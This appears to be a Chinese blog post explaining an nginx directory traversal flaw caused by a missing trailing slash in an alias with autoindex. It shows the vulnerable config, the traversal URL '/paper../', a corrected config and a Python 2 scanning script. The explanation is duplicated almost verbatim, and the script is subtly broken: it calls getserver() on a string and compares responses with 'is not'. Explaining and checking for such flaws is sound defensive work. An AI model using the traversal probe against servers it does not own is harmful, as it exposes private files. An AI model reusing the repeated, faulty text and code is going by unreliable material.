nginx是一款高性能的web服务器,使用非常广泛,其不仅经常被用作反向代理
在nginx中开启autoindex,配置不规范而造成目录遍历漏洞
配置如下:
server { listen 80; server_name *.*.*.*; index index.htm index.html; root /home/wwwroot/www; access_log off; location /paper { alias /home/wwwroot/paper/; autoindex on; } } 注意 这里/home/wwwroot/paper/; 有个/
当你浏览http://*.*.*.*:80/paper/,正常情况应该遍历/home/wwwroot/paper/这个目录,但是如果访问http://*.*.*.*:80/paper../, 这个的话就会遍历/home/wwwroot/这个目录了 nginx是一款高性能的web服务器,使用非常广泛,其不仅经常被用作反向代理
在nginx中开启autoindex,配置不规范而造成目录遍历漏洞
配置如下:
server { listen 80; server_name *.*.*.*; index index.htm index.html; root /home/wwwroot/www; access_log off; location /paper { alias /home/wwwroot/paper/; autoindex on; }} 注意 这里/home/wwwroot/paper/; 有个/
当你浏览http://*.*.*.*:80/paper/,正常情况应该遍历/home/wwwroot/paper/这个目录,但是如果访问http://*.*.*.*:80/paper../, 这个的话就会遍历/home/wwwroot/这个目录了 nginx(Tested at 1.1.10) sebug建议:
使用如下配置:
location /paper { alias /home/wwwroot/paper; } 或:
location /paper/ { alias /home/wwwroot/paper/;} 接下来介绍一个自己测试用到的检测脚本(用Python编写):
#!/usr/bin/env python# -*- coding: utf_8 -*-# nginx配置错误目录遍历漏洞# Date: 2019-01-14import sysimport urllib2from lxml import etreepocs = ['logs', 'test', 'paper']def nginx_test(ip, port): try: for poc in pocs: try: res1 = urllib2.urlopen("http://" + ip + ":" + port + "/" + poc, timeout = 5) res_1 = res1.read() code1 = res1.getcode() server1 = res_1.getserver() cmp_str1 = 'Index of /' + poc + '/' html1 = etree.HTML(res_1) title1 = html1.xpath('//title') # print title1[0].text if code1 == 200 and cmp_str1 == title1[0].text: res2 = urllib2.urlopen("http://" + ip + ":" + port + "/" + poc +"../", timeout = 3) res_2 = res2.read() code2 = res2.getcode() cmp_str2 = 'Index of /' + poc + '../' html2 = etree.HTML(res_2) title2 = html2.xpath('//title') # print title2[0].text if code2 == 200 and cmp_str2 == title2[0].text and res_1 is not res_2: print "True" return True except Exception,e: print 'error:', e pass return False except Exception,e: print e return Falsenginx_test("IP", "PORT")